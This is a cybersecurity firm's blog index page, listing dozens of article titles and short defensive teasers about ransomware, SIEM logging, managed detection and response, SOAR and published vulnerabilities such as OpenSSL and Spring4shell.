Ransomware is a popular weapon for cyber criminals. Worldwide in 2020, there were 304 million ransomware attacks, a 62% increase from the year prior, according to Statista. All verticals are vulnerable to these ransomware attacks, which if successful, are a blot on financial statements of the targeted organizations.
Building Trust: Four Tips for MSSPs

Building Trust: Four Tips for MSSPs

Customers look to Managed Security Service Providers (MSSPs) as trusted advisors in achieving digital transformation and navigating ever-evolving data security and privacy regulations. In times of uncertainty, it’s critical to over-deliver and boost your security posture.
Pain-Free Data Security for Medical Offices

Pain-Free Data Security for Medical Offices

It’s understandable that the primary goal of any healthcare practice is to keep their patients healthy and safe. But what about keeping their patients’ data safe too?
Five Takeaways from the 2019 SIEM Study

For of all sad words of tongue or pen, the saddest are these: 'We weren't logging'

It doesn't rhyme and it's not what Whittier said but it's true. If you don't log it when it happens, the evidence is gone forever.
Four CompTIA ChannelCon Takeaways for MSPs to Boost Cybersecurity

Four CompTIA ChannelCon Takeaways for MSPs to Boost Cybersecurity

It was great to be back in Chicago for ChannelCon 2022. Thank you to CompTIA for their successful event, with 1,000 attendees and vendor partners for the extensive formal and informal learning opportunities enabling us to recommend and reinvigorate after the last 24 months.
Once More Unto the Data (Breach), Dear Friends

Once More Unto the Data (Breach), Dear Friends

As I reflect on this year, a Shakespearean quote plays out in my mind – when King Henry the Fifth is rallying his troops to attack a breach, or gap, in the wall of a city, “Once more unto the breach, dear friends”...
Use MITRE ATT&CK to Thwart Ransomware Faster %%sep%% %%sitetitle%%

Use MITRE ATT&CK to Thwart Ransomware Faster

Ransomware has made a resurgence and is impacting both IT service providers and the businesses they serve. What if you had insights into cyber criminal tactics and techniques happening in your environment? What if you knew more about the adversaries you face in this cyber battle? Can you help prioritize potential threats to stop a ransomware attack before it’s too late? The MITRE ATT&CK framework enables defenders to optimize protection beyond legacy tools like anti-virus.
Cybersecurity Professionals

Cybersecurity Professionals

As data breaches occur more and more, it is no secret that the market needs more cybersecurity professionals. Here are a few statistics on the need to educate the next generation on pursuing cyber professional careers.
Death by a Thousand cuts

Death by a Thousand cuts

You may recall that back in 2012, then Secretary of Defense Leon Panetta warned of “a cyber Pearl Harbor; an attack that would cause physical destruction and the loss of life.” This hasn’t quite come to pass has it? Is it dumb luck? Or are we just waiting for it to happen?
Hackers May Just Look to Embarrass You

Hackers May Just Look to Embarrass You

When you think about electronic security, what comes to mind? Do you consider how vulnerable your customer credit cards are, or how easily someone can break into your on-line bank account? These are the most profitable avenues of attack that thieves usually focus on, but occasionally, cybercriminals are motivated by something besides greed.
Does Your Call for Help Bring Hackers to Your Door?

Does Your Call for Help Bring Hackers to Your Door?

There is a new trend facing people who rely on help desks. Hackers are targeting help desks because they know that the people who provide you support have the access into your systems that they want to exploit.
Enriching Event Log Monitoring by Correlating Non Event Security Information

Enriching Event Log Monitoring by Correlating Non Event Security Information

Sometimes we get hung up on event monitoring and forget about the “I” in SIEM which stands for information. Not forgetting Information is important because there are many sources of non-event security information that your SIEM should be ingesting and correlating with security events more than ever before. There’s at least 4 categories of security information that you can leverage in your SIEM to provide better analysis of security events
Coordinated Ransomware Attacks Hit Resource-Constrained Municipalities

Coordinated Ransomware Attacks Hit Resource-Constrained Municipalities

A financially motivated ransomware gang hit 23 local governments in Texas in a coordinated attack. Ransomware is a type of malicious software, often delivered via email or drive-by web downloads, that locks up an organization’s systems until a ransom is paid or files are recovered by other means such as backup restoration.
Top 5 Linux log file groups in/var/log

Top 5 Linux log file groups in/var/log

If you manage any Linux machines, it is essential that you know where the log files are located, and what is contained in them. From a security perspective, here are 5 groups of files which are essential. Many other files are generated and will be important for system administration and troubleshooting.
The Detection Deficit

The Detection Deficit

The gap between the ‘time to compromise’ and the ‘time to discover’ is the detection deficit. According to Verizon DBIR, the trend lines of these have been diverging significantly in the past few years. Worse yet, the data shows that attackers are able to compromise the victim in days but thereafter are able to spend an average of 243 days undetected within the enterprise network before they are exposed.
Front-Line MSSPs Share 2021 Cybersecurity Predictions

Front-Line MSSPs Share 2021 Cybersecurity Predictions

In 2020, we saw digital transformation accelerate along with rising ransomware, threats caused by human error and misconfigurations, and challenges in IT staff retention. While there is no crystal ball, cybersecurity experts share how organizations can optimize finite resources and prioritize security measures.  
 
Expanding Work-from-Home Increases Cybersecurity Risk

Expanding Work-from-Home Increases Cybersecurity Risk

Maintaining strong cybersecurity is crucial as organizations make impromptu decisions to send more and more employees to work from home to help minimize the spread and impact of COVID-19. Before you expand and extend your remote workforce, it’s critical that you take appropriate steps to ensure that by decreasing a health risk to your business, those same actions don’t conversely increase a cybersecurity risk.
When a SIEM is Like an Exercise Machine Stuck Behind the Junk in Your Garage

When a SIEM is Like an Exercise Machine Stuck Behind the Junk in Your Garage

I’m a big believer in security analytics and detective controls in general.  At least sometimes, bad guys are going to evade your preventive controls, and you need the critical defense-in-depth layers that detective controls provide through monitoring logs and all the other information a modern SIEM consumes.
How SOC-as-a-Service Enhances Security Operations

How SOC-as-a-Service Enhances Security Operations

Faced with rising cybersecurity concerns, MSPs and mid-sized organizations are maturing their security posture beyond a network operations center and help desk. But few have realized a centralized security operations center (SOC) with a formal charter and full-time staff.
Safeguard Your Business Against Ransomware Threats

Safeguard Your Business Against Ransomware Threats

As the second iteration of the WannaCry ransomware impacting IT infrastructure around the globe is expected, we want to arm our customers with information to be best prepared.
Make a cybersecurity list and check it twice this holiday season

Make a cybersecurity list and check it twice this holiday season

As the holidays swiftly approach, many of us are making lists and plans as part of the crescendo of year-end activity. We don’t want to forget anything important, but is ensuring safety from cybercrime at the top of your list?
What is privilege escalation and why should you care?

What is privilege escalation and why should you care?

A common hacking method is to steal information by first gaining lower-level access to your network. This can happen in a variety of ways: through a print server, via a phished email, or taking advantage of a remote control program with poor security.
How to control and detect users logging onto unauthorized computers

How to control and detect users logging onto unauthorized computers

Windows gives you several ways to control which computers can be logged onto with a given account.  Leveraging these features is a critical way to defend against persistent attackers.
How to Justify EDR with Three Top Business Cases

How to Justify EDR with Three Top Business Cases

Increasing complexity and frequency of attacks have escalated the need for detection of attacks and incident response. Endpoints are the new battleground as they are a) more pervasive across the network, b) more commonly used by non-IT personnel, and c) less well-defended by IT teams who first move to secure the data center. Endpoint detection and response (EDR) solutions meet the need to rapidly investigate large numbers of systems for evidence of malicious activity, quickly uncover, and then remediate attacks and incidents.
How to Overcome Three Major Cybersecurity Budget Hurdles

How to Overcome Three Major Cybersecurity Budget Hurdles

Success starts with a well-planned strategic budget. Face the fear…now’s the time to plan for powerful yet practical cybersecurity.
Best Practices to Halt Insider Threats

Best Practices to Halt Insider Threats

While nation-state threat actors and external hackers often garner the headlines, insider threats are an often-overlooked threat vector. Rockwell-Boeing, Anthem Healthcare, and Capital One are just a few organizations with damaging data breaches caused by insiders.
Target Has A Bullseye On Its Chest

Target Has A Bullseye On Its Chest

When Target announced that it had suffered a major breach of approximately 40 million credit cards and 70 million customer records, the nation as a whole took a collective gasp in shock. In the aftermath of the initial disclosure, the public then heard from Neiman Marcus that it too had suffered an electronic breach of data that may include credit cards.
EDR vs XDR

EDR vs XDR – Which is the Best Solution for Your Business?

Both technologies provide endpoint protection, but with different levels of sophistication.   For years, endpoint detection and response (EDR) has formed the backbone of many enterprise cybersecurity solutions. EDR technology enables greater visibility into systems, allowing security professionals to detect threats from file-less attacks, document-based malware, and zero-day exploits. 
Today’s CISO Challenges - The Talent Gap

Today’s CISO Challenges - The Talent Gap

It continues to be challenging being a Chief Information Security Officer (CISO) today – and this year promises no rest. As high-profile data breaches escalate, CISOs, CIOs, and other information security professionals believe their organizations are more likely than ever to fall victim to a data breach or cyber attack.
Do you have a cyber blind spot?

Do you have a cyber blind spot?

What's the cost of securing your network from a cyber attack? According to Precision Analytics and The CAP Group, many companies are now spending less than 0.2 percent of their revenue on cybersecurity, at least one-third less than financial institutions. If that's you then you may have a cyber blind spot.
Host-based Versus Network-based Security

Host-based Versus Network-based Security

The argument is an old one; are you better off with a network-based detector, assuming all hosts will eventually communicate, or should you look at each host to determine what they are up to?
Avoid Log Monitoring Gaps with Holistic Coverage

Avoid Log Monitoring Gaps with Holistic Coverage

A data breach today takes 127 days to detect, according to the Ponemon Institute. Comprehensive visibility and real-time analysis of device and application log data provide an early warning of cybersecurity threats before damage occurs. Log monitoring and Security Information and Event Management (SIEM) decision makers sometimes make short-sighted financial decisions to reduce log sources, only to find that it impacts security decision making and incident response.
Compliance is not a proxy for due care

Compliance is not a proxy for due care

Regulatory compliance is a necessary step for IT leaders, but it’s not sufficient enough to reduce residual IT security risk to tolerable levels. This is not news. But why is this the case? Here are three reasons:
Top 4 Security Questions You Can Only Answer with Workstation Logon/Logoff Events

Top 4 Security Questions You Can Only Answer with Workstation Logon/Logoff Events

I often encounter a dangerous misconception about the Windows Security Log: the idea that you only need to monitor domain controller logs.  Domain controller security logs are absolutely critical to security but they are only a portion of your overall audit trail.  Member server and workstation logs are really just as important and I’m going to focus this article on the top 4 questions you can only answer with workstation logon/logoff events.

Venom Vulnerability exposes most Data Centers to Cyber Attacks

Venom Vulnerability exposes most Data Centers to Cyber Attacks

Just after a new security vulnerability surfaced Wednesday, many tech outlets started comparing it with HeartBleed, the serious security glitch uncovered last year that rendered communications with many well-known web services insecure, potentially exposing millions of plain-text passwords. But don’t panic. Though the recent vulnerability has a more terrific name than HeartBleed, it is not going to cause as much danger as HeartBleed did.
Cyberattacks on Banks: 5 Growing Threats in 2023

Cyberattacks on Banks: 5 Growing Threats in 2023

Cyberattacks against banks and financial institutions continue to rise as cybercriminals develop new tactics.  The global financial sector is one of the biggest cybercrime targets in the world. The volume and sophistication of cyberattacks on banks surged in 2022, spiking considerably at the very end of the year. 
The Difference Between a SIEM Solution and SIEM Tool: Features vs. Outcomes

The Difference Between a SIEM Solution and SIEM Tool: Features vs. Outcomes

Can you simply buy a “SIEM solution”? Turns out you really cannot, no matter how hard you try nor how passionately the vendor promises. What you can buy at the store is a SIEM tool, which is a completely different thing. SIEM tools are products, while implementing a security or compliance solution involves people, process, and technology. SIEM tools are a critical part of SIEM, but they’re not the whole solution.
How to analyze login and pre-authentication failures for Windows Server 2003 R2 and below

How to analyze login and pre-authentication failures for Windows Server 2003 R2 and below

Analyzing all the login and pre-authentication failures within your organization can be tedious. There are thousands of login failures generated for several reasons. Here we will discuss the different event IDs and error codes and how you can simplify the login failure review process.
Five quick wins to reduce exposure to insider threats

Five quick wins to reduce exposure to insider threats

A data breach has serious consequences both directly and indirectly. Lost revenue and a tarnished brand reputation both inflict harm long after incident resolution and post breach clean-up. Still, many organizations don’t take necessary steps to protect themselves from a potentially detrimental breach.

Essential soft skills for cybersecurity success

Essential soft skills for cybersecurity success

IT workers in general, but more so IT Security professionals, pride themselves on their technical skills. Keeping abreast of the latest threats and the newest tactics to demonstrate to management and peers that one is “worthy.”
Protecting Against Ransomware Attacks: What Every Business Needs to Know

Protecting Against Ransomware Attacks: What Every Business Needs to Know

Ransomware attack frequency is at its height as there have been more than 4,000 ransomware attacks happening each day for over a year now. Follow these tips to help avoid a ransomware breach at your business.
The Art of Detecting Malicious Activity with Logs

The Art of Detecting Malicious Activity with Logs

Randy Franklin Smith compares methods for detecting malicious activity from logs including monitoring for high impact changes, setting up tripwires and anomalous changes in activity levels. Security standards and auditors make much of reviewing logs for malicious activity.
Four Ways MSSPs can Boost Security Speed and Readiness

Four Ways MSSPs can Boost Security Speed and Readiness

As more service providers explore offering a Managed Detection and Response (MDR) solution, they may face indecision or inertia during startup and optimization. Managed Security Service Providers (MSSPs) know that speed matters in cybersecurity as it improves attack surface coverage, team productivity.
Logs for Insider Abuse Investigations

Logs for Insider Abuse Investigations

In most previous newsletters, we have discussed the use of logging for various regulatory mandates (such as PCI DSS, HIPAA and FISMA) as well as the use of logs for incident response and malicious software tracking. This log data can also be incredibly useful for detecting and investigating insider abuse and internal attacks.
Using Dynamic Audit Policy to Detect Unauthorized File Access

Using Dynamic Audit Policy to Detect Unauthorized File Access

One thing I always wished you could do in Windows auditing was mandate that access to an object be audited if the user was NOT a member of a specified group. Why? Well sometimes you have data that you know a given group of people will be accessing and for that activity you have no need of an audit trail. Let’s just say you know that members of the Engineering group will be accessing your Transmogrifier project folder and you do NOT need an audit trail for when they do. But this is very sensitive data and you DO need to know if anyone else looks at Transmogrifier.
Detect Persistent Threats on a Budget

Detect Persistent Threats on a Budget

There’s a wealth of intelligence available in your DNS logs that can help you detect persistent threats. So how can you use them to see if your network has been hacked, or check for unauthorized access to sensitive intellectual property after business hours?

Remote Work: Hidden Evils Revealed

Remote work is seemingly here to stay, with many workers forgoing their commute to work for a nice stroll to their in-home office. The WFH movement provides great flexibility but comes with even greater challenges for cybersecurity.   A 200% increase in cyberattacks has been witnessed following the remote working surge, leading to a greater […]
Phishing

Phishing: The World's Top Cyber Threat

What is Phishing? Phishing is a type of online fraud which aims to steal personal and financial information by impersonating reputable companies. Phishing can be done through email, websites, and social media. One of the most common ways phishers try to get your information is by sending you an email from a company you do […]
OpenSSL 3.0.7 Released: Everything You Need to Know About the High-Severity Vulnerability

OpenSSL 3.0.7 Released: Everything You Need to Know About the High-Severity Vulnerability

OpenSSL originally warned this patch would fix a critical vulnerability impacting all OpenSSL 3.0 installations. OpenSSL has released a patch fixing the headline-making vulnerability it first announced on October 27th, 2022.  
OpenSSL Critical Vulnerability: Everyone Must Update to Version 3.0.7

OpenSSL Critical Vulnerability: Everyone Must Update to Version 3.0.7

The open-source cryptographic library is an industry-standard found in an enormous range of applications. In late October, the OpenSSL Project announced it would release a patch for a critical security vulnerability on November 1st, 2022. The organization did not share any details about the vulnerability itself, other than the fact that it impacts all OpenSSL […]
Ransomware

Ransomware Attacks and How to Protect Yourself

What is Ransomware? An organization or user's access to data on their computer is restricted by malware known as "ransomware." Cybercriminals put businesses in a situation wherein paying the ransom is the quickest and least expensive option to recover access to their data by encoding these files and requesting a ransom demand for the decryption […]

How NDR Is Revolutionizing Cybersecurity

Network Detection and Response (NDR) is an exploding field of cybersecurity, providing network-wide monitoring and advanced detection of potential malicious threat actors and suspicious activity, that other tools may miss. An NDR solution continuously scans all entities of network traffic while creating a baseline of normal network activity, creating an incredibly difficult environment for attackers […]
biometrics post

How Do Biometrics Affect Cybersecurity? 

Biometrics 101  Biometrics utilize your physical characteristics to assess identification matters such as fingerprint scans, facial recognition, retina scans, etc. as a more advanced sector of security. Biometrics is simply defined as a biological measurement or a unique physical characteristic that not even your twin would share. Think of it as you, yourself, being the […]
Cybersecurity Awareness

Cybersecurity Awareness Month | October 2022

  Starting 18 years ago, cybersecurity awareness month has magnified into a global effort to educate, inform, and empower everyone to protect themselves online as cyberthreats continue to see dramatic increases over the past decade. As our livelihoods shift predominately online, we become more vulnerable to prying eyes and malicious threat actors. This collaboration between […]
Machine Learning

Machine Learning and AI in Cybersecurity

Artificial intelligence (AI) and machine learning are positioned to assist today's enterprises as they fight to defend themselves against the rising number of cyber attacks.    Real-time learning and analysis of potential cyber risks is made feasible by AI and machine learning. Additionally, they use computers to create behavioral models, employing these models to forecast […]
Incident Response in Exabeam: How to Create Playbooks and Automate Security Incident Resolution

Incident Response in Exabeam: How to Create Playbooks and Automate Security Incident Resolution

Learn how to use the platform's security orchestration, automation, and response (SOAR) solution to quickly investigate and resolve security incidents.  Exabeam enables security teams to automate their response to security incidents, dramatically reducing the time and resources required to mitigate active attacks. The platform's Incident Responder lets analysts automate time-consuming tasks when investigating incidents and […]
Broad Blog Graphic (5)

Cloud Attacks: Are You Still Safe?

Cloud Attacks: Are You Still Safe?  95% of respondents are using the cloud, according to the 2016 State of the Cloud Survey. The nature of cloud-based computing offers the prospect of severe cloud security breaches despite its fast expansion, which can significantly harm an enterprise. One of the top worries is data security.   How […]
Cyber Corruption; Cybercriminal Blog Graphic - LinkedIn

Cyber Corruption: LAPSUS$

What do Microsoft, Okta, T-Mobile, Nvidia, and LG all have in common? Well, for starters, they have all been extorted by one of the most prolific and unpredictable hacking groups of 2022.   The group coined, LAPSUS$, remarkably infiltrated and extorted a handful of the largest, pre-imminent tech giants in the world through a unique […]
Public WiFi:

Public WiFi: Top Dangers for Remote Work

Public Wifi & Working From Home By 2025, upwards of 36 million Americans will have entirely remote or flexible occupations, an 87 percent post-pandemic rise, according to some analysts. One might infer that having the opportunity to work outside of the office has led many employees to select open areas like cafés, diners, railway stations, […]
Digital Footprint

Keep Your Digital Footprint in Step with Your Information Security Needs

Every online action you perform involves sharing a bit of data – over time, that data can add up.  Successful organizations and influential people rely on the public Internet to promote their brands, ideas, and products. A significant amount of time and energy goes into building a brand, and most of it is spent online. 
cybercrime

A Guide to Cybercrimes and How They are Disrupting Our Lives 

What is Cybercrime?  Cybercrime is a term that refers to all criminal activity perpetrated using computers and the internet. It includes crimes like hacking, phishing, identity theft, and more.      The term cybercrime was first coined in the late 1980s by William Gibson in his novel “Neuromancer”. He used it to refer to crimes […]
Palo Alto Networks PAN-OS Vulnerability: What Users Need to Know

Palo Alto Networks PAN-OS Vulnerability: What Users Need to Know

The flaw has been exploited in real-world attacks, but most Palo Alto customers will remain unaffected.  In the second week of August, Palo Alto Networks issued a security warning for a high-severity vulnerability in its PAN-OS operating system. Many of the company' networking hardware products use this operating system, but not all of them are […]
How to Create a Ransomware-Ready Disaster Recovery Plan

How to Create a Ransomware-Ready Disaster Recovery Plan

Data disasters come in all shapes and forms, and enterprises need to have multi-layered contingencies in place. A good enterprise disaster recovery plan protects against a wide variety of scenarios. It must ensure business continuity – or provide a plausible roadmap for it – in case of natural disasters, human errors, and malicious cyberattacks. 
How to Access and View Event Logs Using Exabeam in Linux

How to Access and View Event Logs Using Exabeam in Linux

Examining event and endpoint logs is the first step towards building comprehensive customized rulesets.  Many information security leaders have significant deployments on open-source operating systems based on the Linux kernel, and for good reason. Linux distributions like Debian and Ubuntu have a reputation for visibility and security at a price that's impossible to beat – […]
Linux

How to Set Up Robust Log Management in Linux with AuditD

Find out how to configure Linux to generate comprehensive log feeds for SIEM, UEBA, and SOAR technologies.  Linux is an attractive solution for enterprises in search of a flexible, powerful operating system. Many different operating systems use the Linux kernel, such as Ubuntu, Debian, and Red Hat Enterprise Linux (RHEL), which itself is an enterprise-ready […]
Craft Custom Rules to Improve Exabeam Performance: Part 2

Craft Custom Rules to Improve Exabeam Performance: Part 2

Enriched data enables analysts to conduct faster, more accurate investigations in Exabeam.  The first part of this series covered some of the ways analysts can use context to build custom rules in Exabeam. Teaching Exabeam to recognize network zones and asset groups enables security professionals to cluster similar behaviors together, making it easier to investigate […]
Security Posture

Security Posture Priorities

Solution Evaluation An integral step in creating a resilient cybersecurity platform is to perform an audit of your organizations existing policies and procedures. Lumifi can help with this endeavor during our Asset Criticality Assessment, during client onboarding process, and periodically on a structured timeline. Here are components we consider when looking at the entire security […]
Managed Detection and Response

Breaking-Down Managed Detection and Response

Cybersecurity is a very important issue for any organization, and events can lead to a variety of negative outcomes; incidents often result in data theft, financial loss, and even damaged reputation. The cost of an attack is very high, which is why it's important to be prepared for the worst-case scenario. Managed Detection and Response […]
SOAR

Simplifying SOAR

Security Orchestration, Automation and Response (SOAR) is an integrated, automated, and orchestrated set of services that provide a response to cyber incidents. It enables the rapid identification of cyber incidents and prevents them from escalating into major disasters.   SOAR was developed as a response to the need for automating incident responses and remediating security incidents. SOAR utilizes a framework that can […]
The 3 Types of Firewalls: What Is the Most Secure Type of Firewall?

The 3 Types of Firewalls: What Is the Most Secure Type of Firewall?

We'll chat more in detail further along here, but right away, we want to tell you what the three types of firewalls are:
What Is SOAR Security?

What Is SOAR Security?

The SOAR in SOAR security stands for:
How to Configure Your Windows Audit Policy to Optimize SIEM Performance

How to Configure Your Windows Audit Policy to Optimize SIEM Performance

You can significantly improve Windows' log reporting capabilities with a few key changes. Your SIEM works by collecting log data from across the enterprise IT environment. The more detailed and comprehensive these logs are, the more accurate its insights will be. Although Windows has a basic set of log reporting capabilities built in, the operating […]
Everything You Need to Know About the Spring4shell Vulnerability

Everything You Need to Know About the Spring4shell Vulnerability

A newly discovered Spring vulnerability enables remote code execution on enterprise Java applications. In late March, a developer publicly posted exploit code describing a zero-day vulnerability in the popular Spring Framework, a popular solution for building enterprise applications in Java. Spring is part of VMWare's suite of enterprise products, designed to let developers quickly and […]
How to Alleviate Alert Fatigue When Enterprise Security Needs Keep Growing

How to Alleviate Alert Fatigue When Enterprise Security Needs Keep Growing

Cybersecurity leaders prioritize security event management efficiency now more than ever. Security analysts receive messages and alerts all day long. It' a core part of the job. 
Virtualization Security What are the Real World Risks

Virtualization Security What are the Real World Risks

There’s been a lot of recent hype about security risks with the rise of virtualization, but much of it is vague and short on specifics.  There is also an assumption that all the security available on a physical server simply disappears when it migrates to being a virtual machine.  This is not true.
MDR; Everything You Need to Know About SOC 2 Compliance

How Advanced MDR Helps with Security Detection and Response of 7 Common Threats

677.66 million. That's the number of cumulative detections of newly-developed malware applications worldwide in 2020. If you think your organization's basic antivirus software can keep up with this constant barrage of attacks, well, it's simply not possible.
EDR Endpoint Protection: What It Is

EDR Endpoint Protection: What It Is, How It Works, and Its 5 Benefits to Businesses

The average IT department manages thousands of endpoints, each coming with a very real risk of cyberattack. From laptops and servers to IoT devices and digital assistants, hackers are constantly on the lookout for an open door to infiltrate.
Upgrade Your Audit Policies: What Should You Be Logging?

Upgrade Your Audit Policies: What Should You Be Logging?

Your security response depends heavily on what data you log, and how you log it. Your security information and event management (SIEM) solution uses logs to build an accurate picture of your organization's security profile.  
What Is Managed Detection and Response and Why Do You Need It?

What Is Managed Detection and Response and Why Do You Need It?

The security of data and systems is one of the most important concerns in today' business world. If your data is at risk or compromised, it can cripple your operations along with the trust others have in your business.
Castra's Complete Guide to Information Security Managed Services

Lumifi's Complete Guide to Information Security Managed Services

Companies must protect important and sensitive data no matter its form. So, what is information security? It includes everything from making sure digital information is protected against hackers to assuring a physical filing cabinet full of billing information is defended against thieves.
Is SOAR A Must For Your Tech Stack? | Castra

Is SOAR A Must For Your Tech Stack?

Security Orchestration, Automation, and Response (SOAR) tools enable analysts to establish efficient workflows for handling both common and highly sophisticated threats.  Even the best enterprise cybersecurity workflows suffer from scalability issues. 
The Necessity of Threat Hunting

The Necessity of Threat Hunting

Press play to get an inside look at how Lumifi works with Anomali ThreatStream.
How Fortune 200 Enterprises Select MDR Vendors | Castra

How Fortune 200 Enterprises Select MDR Vendors

For large organizations, managed detection and response is just one of many cybersecurity solutions that must work together seamlessly. Enterprise cybersecurity professionals have to choose their tech stack wisely.  
New Government Rule for Cybersecurity Event Logging | Castra Federal Standards

New Federal Standards Prioritize Logging to Detect, Prevent, and Remediate Cybersecurity Incidents

The Federal government has defined new standards for cybersecurity event logging systems. On May 12th, 2021, just days after the headline-making Colonial Pipeline ransomware attack, the White House issued an executive order on improving the nation' cybersecurity.  
Tony Simone Named Exabeam's "Techical Person of the Year" for 2021

Tony Simone Named Exabeam's "Techical Person of the Year" for 2021

Castra Managed Services is excited to announce that its company co-founder, Tony Simone, has been named Exabeam' "Technical Person of the Year" for 2021. Exabeam, the Gartner Magic Quadrant leader in security information event management (SIEM), held its annual Spotlight Partner Summit early last week, where various partners met to discuss industry trends and new developments in SIEM technology.  
How Data Lake and Cloud Archive Can Improve Your Security Posture

How Data Lake and Cloud Archive Can Improve Your Security Posture

Is your business weighing out the pros and cons of data lake and cloud archive? We can help with that. What we need to establish first is how does your organization handle the compliance regarding your company' and customer' data? Where does that data reside? Is it secure, and if you needed to recall aging data […]
Improving Visibility and Preventing a Miss - Part 3: Custom PowerShell Rules

Improving Visibility and Preventing a Miss - Part 3: Custom PowerShell Rules

A major risk for a SIEM or SOAR is not effectively using key PowerShell logs collected. We talked about the risk of incorrect and empty logs or lack of logging required for advanced detection, and once you have them we cannot assume machine learning and modeling behavior will detect everything.
Cybersecurity vs. Network Security IT architecture

The Difference Between Cybersecurity & Network Security

Today’s threat landscape is more diverse and expansive compared to any period since the beginning of the information age. Recent security trends such as the increase in malicious activities rising by 358% from July 2019 to July 2020 and 90% of healthcare organizations reporting security breaches to highlight the increased dangers enterprises face. To effectively detect and […]
Update on PrintNightmare & Kaseya Ransomware

Update on PrintNightmare & Kaseya Ransomware

Over the 4th of July weekend, two breaches were brought to Lumifi's attention pertaining to PrintNightmare and Kaseya. Details on PrintNightmare While you likely do not have Print Servers exposed to the world (we hope not), we also wanted to note that we are aware of this and have diligently reviewed detection methodology. POC code […]
Improving Visibility and Preventing a Miss - Part 2: Custom PowerShell Collection

Improving Visibility and Preventing a Miss - Part 2: Custom PowerShell Collection

A worrisome risk for a SIEM or SOAR is not collecting key logs used or required for the advanced modeling in today's platforms. In our experience, incorrect/empty logs or lack of logging required for advanced detection (as we discussed in the first post on this topic), is obviously bad, yet failing to pick them up […]
Gartner Magic Quadrant

Strong Showing For Lumifi Partners In 2021 Gartner Magic Quadrant

With a clear separation in the market among the considered vendors, the newest Gartner Magic Quadrant for EPP, showcases 4 Lumifi partners who are leading in this space. Recently, Gartner released their Magic Quadrant for EPP and we saw a clear separation in the market among the considered vendors. As an industry we have witnessed […]
cyber-insurance-liability-coverage

What is Cyber Insurance?

Statistics show that the fallout from successful cybersecurity incidents has both financial and business-related consequences. A data breach costs the average enterprises approximately $60,000, and in extreme situations, small and medium-sized businesses may go out of business within 6 months from the date the incident occurred. Thus, to determine whether the financial cost of successful […]
Top-5-Most-Popular-Certifications

Top 5 Most Popular Cybersecurity Certifications

The cybersecurity analyst has become the third most valuable job description in the technology industry. The increasing security incidents to IT infrastructure, the demand for accountability from end-users, and the financial cost of successful breaches are significant reasons enterprises and startups are taking cybersecurity seriously. Ambitious professionals who choose a career in IT security are […]
Ransomware

What is Ransomware?

Ransomware is a form of malware cybercriminals use to encrypt data stored in computers or online servers. Cybercriminals demand payment to release the encryption key blocking the user from accessing the encrypted data. Payment is typically made through diverse mediums, including digital currency like Bitcoin. Once payment has been made, the victim is generally provided with […]

F5 BIG-IP Vulnerabilities

Twelve days ago, F5 announced several security vulnerabilities that went primarily overshadowed by the Exchange/Hafnium situation. It's important to understand that some of these are critical, remote command execution-level vulnerabilities that require nothing more than an attacker to connect to an F5 BIG-IP device. For those devices, being positioned "in front of" web server clusters […]
Microsoft Exchange Vulnerability

Microsoft Exchange Vulnerability

As you may know, a zero-day vulnerability in Microsoft Exchange Server was published last week that is garnering a lot of attention. Microsoft has attributed this to a known threat actor that has now compromised thousands or even tens of thousands of systems with these attacks, though it's important to understand that other attackers are […]
5 Do's and Don'ts to Qualify Your Next MDR deployment

5 Do's and Don'ts to Qualify Your Next MDR

(Updated April 2022) The success of your managed detection and response deployment hinges on asking the right questions.  Managed detection and response is a valuable element of your enterprise' security posture. With the right technologies in the hands of competent, highly trained analysts, you can significantly reduce security risks while paying a fraction of what […]
what-is-penetration-testing

What is Penetration Testing?

A penetration test or pen test is a simulated cyber-attack against computer systems, application systems, and IT infrastructure to discover loopholes. These simulated cyber-attacks come in diverse forms with the intent of breaching a system through its servers, web or mobile applications, and other endpoints. The purpose of pen testing is to discover exploitable vulnerabilities in […]
What-is-the-MITRE-ATT&CK-Framework_

What is the MITRE ATT&CK Framework?

Learn about the MITRE ATT&CK® Framework and how cybersecurity teams leverage its matrix of tactics and techniques to assess risk and vulnerabilities within an organization. Definition  The MITRE ATT&CK Framework is a knowledge base of tactics and techniques that can be used as a foundation for classifying adversary behaviors and assessing an organization’s vulnerabilities.  Created in 2013 by the […]
SolarWinds-vs.-Splunk_Comparing-Two-Leading-SIEM-Solutions

SolarWinds vs. Splunk: Comparing Two Leading SIEM Solutions

SolarWinds Log Event Manager and Splunk Enterprise Security are two of the top security information and event management tools. Both SIEM solutions differ but offer high-performing features that simplify threat detection and response within expansive networks. Here, we look at key differentiators between both options. To effectively compare both options, the following criteria were chosen […]
What-is-SOAR

What is SOAR?

SOAR is an acronym thrown around a lot within the cybersecurity industry, but what does it really mean? SOAR stands for Security Orchestration, Automation and Response. SOAR tools are the technologies used to orchestrate responses to security incidents and assign responsibilities between various tools and individuals within a security team or enterprise. The working principles of […]
5-Questions-to-Ask-an-MSSP

5 Questions to Ask an MSSP

An organization’s choice to seek a managed security services provider (MSSP) to guard over its IT infrastructure is usually based on three major reasons. According to Gartner’s 2020 Market Guide for Managed Detection and Response Services, they are: To simplify the decision-making process while ensuring the final choice leads to a long-lasting business relationship, here […]
MDR-Service-Delivery-Options; managed detection and response

MDR Service Delivery Options

Organizations of all sizes rely on managed security service providers (MSSPs) to deliver managed detection and response (MDR) and additional cybersecurity services at scale. Understanding the various service options can save your organization money and resources. The difference in technology and its usage is the primary differentiating factor between MDR providers. While some rely on […]
FireEye Breach - Our Observations

FireEye Breach - Our Observations

Cybersecurity Firm, FireEye Experienced a Major Breach in December of 2020 Castra actively investigated for deeper, specific information from our sources about how FireEye detected such a sophisticated, persistent, nation-state backed novel attack on their network and systems. This likely was the most frightening and impactful breach that we have seen happen all year.
What-is-Microsoft-Defender-for-Endpoint_

What is Microsoft Defender for Endpoint and How Does it Work?

Microsoft Defender for Endpoint, formerly known as Microsoft Defender Advanced Threat Protection, provides enterprise-level protection to endpoints to prevent, detect, investigate, and respond to advanced threats. The platform provides preventative protection, post-breach detection, automated investigation, and response to possible threats or breaches in security. Whether your company is considering implementing Microsoft Defender for Endpoint or […]
Insider Threat Activity

Behavioral Indicators of Insider Threat Activity

Contrary to popular beliefs, an insider threat is not always a security risk within an organization's immediate perimeter. Current employees and managers aside, an insider threat could be a former employee who had access to specific information, a third-party consultant, or a business partner. In any case, malicious insiders account for about 38 percent of […]
Cybersecurity Training

Why User Education is #1 in Cyber Resilience

Statistical data shows that over one-third, or 36 percent, of ransomware infections happen due to a lack of cybersecurity training across organizations across all industry verticals. Another 30 percent of the ransomware infections worldwide materialize because of weak user passwords, while 25 percent are due to poor user practices, according to managed service providers (MSPs) […]
